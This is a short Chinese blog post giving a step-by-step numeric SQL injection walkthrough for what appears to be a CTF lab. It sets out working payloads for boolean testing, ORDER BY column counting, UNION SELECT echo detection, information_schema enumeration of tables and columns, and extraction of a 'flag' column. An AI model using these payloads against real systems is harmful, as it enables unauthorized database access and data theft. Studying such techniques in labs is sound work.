数字型注入

数字型注入

第一步

id = 1 or 1=1​ 或者 id = -1 or 1=1 ​检查是否有漏洞 防火墙检测:id=1 and 1=1​、id=1 and 1=2

第二步

确认当前数据库的列数:?id=1+order+by+2​ 或者 ?id=-1+order+by+2 查是不是两列,报错就不是

第三步

?id=-1+union+select+1,2 联合注入找回显:看数据库返回的是列 这里是判断回显是1或者2

如果第三步发现屏幕上出现的是数字 2​,那你必须写 union select 1, database()

第四步:爆破当前的表名

?id=-1+union+select+database(),2

第五步:找当前数据库里面有什么表-1+union+select+1,group_concat(table_name)+from+information_schema.tables+where+table_schema='sqli'

这里的sqli是上一步爆破的表名字。

第六步:确认这个表有多少列 -1+union+select+1,group_concat(column_name)+from+information_schema.columns+where+table_name='flag'

第七步:拿flag的数据

-1+union+select+1,flag+from+flag

posted @ 2025-12-15 20:06  xx666q  阅读(4)  评论(0)    收藏  举报